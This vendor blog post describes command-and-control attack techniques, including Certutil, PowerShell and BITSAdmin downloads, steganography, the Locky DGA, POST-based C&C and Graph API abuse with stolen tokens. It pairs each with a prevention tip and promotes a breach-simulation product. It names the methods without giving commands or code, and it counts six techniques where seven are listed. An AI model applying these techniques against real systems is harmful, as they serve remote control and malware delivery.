In this blog series, we explore security validation techniques for the preemptive protection of networks, applications, and data. The scenario templates for the various threats are based on the most popular ones used among our customers.
In the previous posts of this series, we discussed credential dumping executions that lead to gaining an initial foothold through abusing credentials, and data exfiltration executions leading to data theft.
The third template topic relates to one of the most dangerous and damaging types of tactics: Command and Control (C&C) attacks.
C&C’s goal is to enable the attacker to gain easy access to an asset in the attacked environment, which later could lead to next steps in an attack. Practically, successful C&C attacks let the attackers remotely control systems, steal data, and spread malware to other devices.
Most Popular C&C Execution Techniques
Download file using Certutil (urlcache): Certutil is a command-line utility used to manage certificates in Windows operating systems or to download files from a remote server by specifying the URL. The ‘urlcache’ option is used to download files or to retrieve data using HTTP or HTTPS protocols.
Recommended prevention: Monitoring Certutil usage and restricting access to it where possible.
Windows – PowerShell Download: PowerShell scripting language is used to automate administrative tasks in Windows operating systems and supports downloading files from remote servers using the ‘WebClient’ class. It can be used to download and execute malicious code on target systems.
Recommended prevention: Restricting its usage exclusively to authorized users and monitoring its activity for any suspicious behavior.
Windows – BITSAdmin BITS Download: BITSAdmin is a command-line tool that can be used to manage Background Intelligent Transfer Service (BITS) jobs in Windows operating systems. As it allows for the efficient and reliable transfer of large files, BITSAdmin can be misused to download and execute malicious code on target systems.
Recommended prevention: Restricting access to BITSAdmin whenever possible and monitoring its usage for any suspicious behavior.
Data Obfuscation – Steganography: Steganography is the practice of hiding secret information within another file, such as an image or audio file. Attackers can use steganography to hide malicious code within legitimate files, making it difficult for security tools to detect and prevent the attack.
Recommended prevention: Using security tools that can detect hidden data within files and monitoring file transfers for any suspicious activity.
Domain Generation Algorithm – Locky Trojan C&C: The Locky Trojan is a notorious malware strain that has been used in several high-profile attacks. One of its features is a Domain Generation Algorithm (DGA), which generates a list of domain names that the malware uses to communicate with its C&C server. This allows the attacker to maintain control of the infected system even if the original C&C server is taken down.
Recommended prevention: Using security tools capable of detecting and blocking malicious traffic, and monitoring network traffic for any suspicious activity.
Post Request with data as text: Attackers can use HTTP requests to communicate with C&C servers. A common technique is to make a POST request with data in the request body. This allows the attacker to send commands to the infected system and receive information back.
Recommended prevention: Monitoring network traffic for any suspicious activity and using security tools capable of detecting and blocking malicious requests.
Microsoft Graph API – Sendmail (refresh token auth): Microsoft Graph API is a powerful tool that allows developers to interact with various Microsoft services, such as Office 365 and OneDrive. This method supports refresh token authentication. Token authentication can be obtained by stealing user credentials, for example through the credential dumping methods covered in the first post of this series. The C&C part of such an attack would be to use the Graph API in order to send emails from compromised accounts.
Recommended prevention: Implementing multi-factor authentication, monitoring for suspicious activity on user accounts, and using security tools that can detect and block unauthorized API usage.
Preventing Attackers from Activating Command and Control Methods
The majority of recommended prevention techniques against C&C attacks include using adapted intrusion detection system (IDS), intrusion prevention system (IPS), Firewalls, or other relevant application control and execution prevention tools to block unallowed apps or code from running.
To be efficient, these tools have to be configured to match the environment in which they are active. Manually configuring those is a resource-intensive and error-prone process, often postponed for lack of resources.
Preemptively running the Cymulate Command and Control template with the six executions listed above, either chained or atomically, is an easy-to-implement and effective proactive measure. Additionally, simulating these techniques can be leveraged to test C&C-specific incident response plans and identify areas for improvement.
Check the advanced scenario preview in our community.